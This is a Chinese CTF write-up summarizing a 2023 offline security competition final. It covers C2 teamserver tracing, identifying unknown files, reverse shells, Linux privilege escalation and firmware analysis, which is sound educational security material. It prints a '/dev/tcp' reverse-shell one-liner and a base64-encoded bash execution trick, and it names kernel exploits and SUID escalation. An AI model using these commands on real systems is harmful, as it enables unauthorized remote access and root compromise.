2023西湖论剑线下决赛的一些小总结

admin 2023年4月5日18:21:41评论70 views字数 1101阅读3分40秒阅读模式

一、溯源使用了云函数的C2真实IP的思路

题目是给了一个exe木马,要求获取其连接的真实IP,丢进沙箱发现它使用了云函数来隐藏teamserver

2023西湖论剑线下决赛的一些小总结

使用云函数的样本没有特别好的溯源方法,不过也不是完全没机会,依靠网络空间测绘引擎,还是有可能的。

2023西湖论剑线下决赛的一些小总结

本质上是因为teamserver被网络空间搜索引擎识别到并解析出了beacon配置,其中含有云函数地址,所以可以被搜索到。

该方法有一定的局限性,如果目标服务器修改了默认异或密钥,就无法解析出beacon配置了;如果启用时间不长,搜索引擎没有收录,那也无法找到。

参考这种思路,也可以依据空间搜索引擎的全网扫描结果,结合手动确认,逐步缩小范围,最终定位真实teamserver地址。

二、排查未知文件的思路

这道题目也是比较贴近实战的,在应急响应工作中遇到的未知文件基本离不开木马、黑客工具这个范围,攻击者可能将其进行改名、混淆等,排查其作用的思路为:

1.先利用沙箱进行检测,如果仅修改名称,那么md5值不变,很多黑客工具都被放进沙箱检测过,这样就可以关联到其原始名称

2023西湖论剑线下决赛的一些小总结

2.放进虚拟机运行一下,某些工具会在帮助信息里输出名称、logo、调试信息等:

2023西湖论剑线下决赛的一些小总结

3.根据文件中硬编码的一些字符串确定:

2023西湖论剑线下决赛的一些小总结

三、反弹shell及提权

有道题目无法直接通过 bash -i >& /dev/tcp/ip/port 0>&1 来反弹shell,推测原因:

1.机器不出网

2.命令没成功执行

通过wget能成功访问到本地HTTP服务,排除机器不出网的情况,那么解决命令未成功执行的方法:

1.写入shell文件再执行

2.将命令编码执行:bash -c '{echo,<base64字符>}|{base64,-d}|{bash,-i}'

最终用第一种方法成功反弹。

还遇到了Linux提权相关题目,主要有两大常用思路:漏洞提权及suid提权.

漏洞如:

  • • Dirtycow(CVE-2016-5195
  • • Dirtypipe(CVE-2022-0847)
  • • pkexec(CVE-2021-4034)

suid提权则使用https://gtfobins.github.io/查找,如该题使用find提权到root读取flag

2023西湖论剑线下决赛的一些小总结

四、IOT固件分析和串口使用

拿到题目是一个固件,可以使用binwalk直接解包

2023西湖论剑线下决赛的一些小总结

拿到文件系统进行分析

2023西湖论剑线下决赛的一些小总结

一开始可以通过使用串口可以进shell,使用SecureCRT工具连接串口,设置波特率115200

2023西湖论剑线下决赛的一些小总结

遇到串口调试无法拿shell时,可以通过固件重新打包,修改掉etc/passwd文件修改root用户的密码来使用ssh远程连接。

-END-

2023西湖论剑线下决赛的一些小总结

原文始发于微信公众号(弱口令安全实验室):2023西湖论剑线下决赛的一些小总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月5日18:21:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2023西湖论剑线下决赛的一些小总结http://cn-sec.com/archives/1655217.html

发表评论

匿名网友 填写信息